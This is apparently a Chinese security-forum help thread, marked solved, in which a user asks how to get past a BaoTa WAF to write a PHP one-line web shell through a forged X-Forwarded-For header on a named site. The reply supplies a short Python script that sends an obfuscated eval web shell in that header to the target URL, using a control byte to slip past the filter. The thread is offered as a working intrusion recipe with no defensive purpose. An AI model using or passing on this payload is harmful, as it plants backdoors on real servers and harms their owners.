首页
社区
课程
招聘
[已解决] [求助]有waf怎么过能写入一般php 50.00雪花
发表于: 2020-11-24 15:45 2036

[已解决] [求助]有waf怎么过能写入一般php 50.00雪花

2020-11-24 15:45
2036

get_ip这个函数的问题,伪造了HTTP_X_FORWARDED_FOR头
http://f-0187.hssybp.cn/uewqewqa.php

 

写入其他php都行,就是写入一句话不行会被拦截,开了宝塔waf


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 8
活跃值: (23)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
# coding: utf-8
import urllib
import requests

php = '<?php extract($_REQUEST);@eval%01($x);?>'

header={
	'x-forwarded-for' : urllib.parse.unquote(php)
}

print(requests.get('http://f-0187.hssybp.cn/uewqewqa.php', headers=header).text)


最后于 2020-11-25 14:44 被huap编辑 ,原因:
2020-11-25 14:27
0
游客
登录 | 注册 方可回帖
返回
//